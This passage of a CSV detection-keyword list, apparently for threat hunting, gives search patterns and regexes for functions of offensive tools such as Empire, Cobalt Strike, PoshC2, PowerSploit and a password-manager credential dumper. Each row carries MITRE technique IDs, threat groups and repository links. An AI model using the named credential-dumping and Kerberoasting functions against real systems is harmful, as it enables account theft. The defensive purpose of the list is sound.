"*getCreds1passwordplugin.h*",".{0,1000}getCreds1passwordplugin\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*getCreds1passwordplugin2.h*",".{0,1000}getCreds1passwordplugin2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*getCrossC2Beacon*",".{0,1000}getCrossC2Beacon.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*getCrossC2Site*",".{0,1000}getCrossC2Site.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*Get-DCBadPwdCount*",".{0,1000}Get\-DCBadPwdCount.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SMBAutoBrute.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-DCsNotOwnedByDA*",".{0,1000}Get\-DCsNotOwnedByDA.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*Get-DecodedPassword*",".{0,1000}Get\-DecodedPassword.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 
- TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Get-DecodedPassword*",".{0,1000}Get\-DecodedPassword.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Get-DecryptedCpassword*",".{0,1000}Get\-DecryptedCpassword.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Get-DecryptedCpassword*",".{0,1000}Get\-DecryptedCpassword.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-DecryptedPassword*",".{0,1000}Get\-DecryptedPassword.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Get-DecryptedPassword*",".{0,1000}Get\-DecryptedPassword.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - 
TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Get-DecryptedSitelistPassword*",".{0,1000}Get\-DecryptedSitelistPassword.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*get-delegation *All*",".{0,1000}get\-delegation\s.{0,1000}All.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool 
uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*get-delegation *Unconstrained*",".{0,1000}get\-delegation\s.{0,1000}Unconstrained.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*Get-DFSshare*",".{0,1000}Get\-DFSshare.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-DiscosdurosGet-PSDrive*",".{0,1000}Get\-DiscosdurosGet\-PSDrive.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*getdllbaseaddress*",".{0,1000}getdllbaseaddress.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*get-dodgyprocesses*",".{0,1000}get\-dodgyprocesses.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - 
T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Get-DomainAdmins.ps1*",".{0,1000}Get\-DomainAdmins\.ps1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*Get-DomainComputer -TrustedToAuth | select name",".{0,1000}Get\-DomainComputer\s\-TrustedToAuth\s\|\sselect\sname","offensive_tool_keyword","AD exploitation cheat sheet","msds-allowedtodelegateto*","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","N/A","Lateral Movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-DomainDFSShareV1*",".{0,1000}Get\-DomainDFSShareV1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-DomainDFSShareV2*",".{0,1000}Get\-DomainDFSShareV2.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-DomainForeignGroupMember*",".{0,1000}Get\-DomainForeignGroupMember.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Abusing inter-forest trust Powersploit","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://powersploit.readthedocs.io/en/latest/Recon/Get-DomainForeignGroupMember/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-DomainManagedSecurityGroup*",".{0,1000}Get\-DomainManagedSecurityGroup.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-DomainObjectACL -*",".{0,1000}Get\-DomainObjectACL\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-DomainSearcher*",".{0,1000}Get\-DomainSearcher.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*GetDomainsForEnumeration*",".{0,1000}GetDomainsForEnumeration.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*Get-DomainSpn*",".{0,1000}Get\-DomainSpn.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SQLInstanceDomain.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*getdomainspnticket*",".{0,1000}getdomainspnticket.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Get-DomainSPNTicket*",".{0,1000}Get\-DomainSPNTicket.{0,1000}","offensive_tool_keyword","BloodHound","Kerberoasting With PowerView","T1558 - T1208 - T1552","TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "*Get-DomainSPNTicket*",".{0,1000}Get\-DomainSPNTicket.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 